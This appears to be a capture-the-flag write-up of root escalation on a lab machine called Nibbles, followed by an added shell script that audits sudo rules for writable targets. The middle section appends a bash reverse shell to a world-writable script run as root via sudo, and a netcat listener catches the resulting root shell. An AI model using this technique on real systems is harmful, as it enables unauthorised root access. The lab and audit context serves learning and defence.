4 privesc

$ unzip personal.zip
Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh
  
$ tree
.
└── stuff
    └── monitor.sh
	
sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
	
ls -la
total 16
drwxr-xr-x 2 nibbler nibbler 4096 May  4 17:40 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10  2017 ..
-rwxrwxrwx 1 nibbler nibbler 4095 May  4 17:39 monitor.sh


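monitor.sh is world-writable (-rwxrwxrwx) and nibbler can run it as root through sudo with no password, so anything appended to it runs as root. Append a reverse shell and run the script with sudo: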
echo "bash -c 'bash -i >& /dev/tcp/10.10.14.15/6969 0>&1'" >> monitor.sh
sudo /home/nibbler/personal/stuff/monitor.sh

$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.75] 36550
whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
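
The root cause above is a sudoers rule pointing at a script that nibbler owns and anyone can write. The following is an added example, not part of the original notes: a defender-side check that reads `sudo -l` output and reports any permitted command whose file or parent directories a non-root user could modify. The function names are hypothetical and it assumes Linux with GNU `stat`.

```sh
# Added example (not from the write-up). Assumes Linux with GNU stat.
# Usage after sourcing this file: sudo -l | audit_sudo

# Print the command path from each rule line of `sudo -l` output on stdin,
# e.g. "    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh".
# Handles one command per rule line; tags such as NOPASSWD: are skipped.
sudo_targets() {
    sed -n 's|^[[:space:]]*([^)]*)[[:space:]]*\([A-Z]*:[[:space:]]*\)*\(/[^[:space:],]*\).*|\2|p'
}

# Walk from the command up to /, reporting every component a non-root user
# could modify or replace. Returns 1 if anything was reported.
check_path() {
    target=$1; p=$1; bad=0
    while :; do
        # A missing component is skipped: who can create it is decided by
        # the permissions of its parent, which is checked next.
        if info=$(stat -L -c '%U %a' "$p" 2>/dev/null); then
            owner=${info% *}; mode=${info##* }
            if [ "$owner" != root ]; then
                echo "$target: $p is owned by $owner, not root"; bad=1
            fi
            writable=$(( 0$mode & 022 )); sticky=$(( 0$mode & 01000 ))
            # Sticky directories such as /tmp (1777) are tolerated.
            if [ "$writable" -ne 0 ] && ! { [ -d "$p" ] && [ "$sticky" -ne 0 ]; }; then
                echo "$target: $p is writable by group/other (mode $mode)"; bad=1
            fi
        fi
        case $p in /|.) break ;; esac
        p=$(dirname "$p")
    done
    return "$bad"
}

# Read `sudo -l` output on stdin and check every permitted command path.
audit_sudo() {
    targets=$(sudo_targets); rc=0
    while IFS= read -r t; do
        if [ -n "$t" ]; then check_path "$t" || rc=1; fi
    done <<EOF
$targets
EOF
    return "$rc"
}
```

On the box in these notes this would report both the 777 mode on monitor.sh and the nibbler-owned directories above it; either one alone is enough to make the NOPASSWD rule equivalent to full root.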
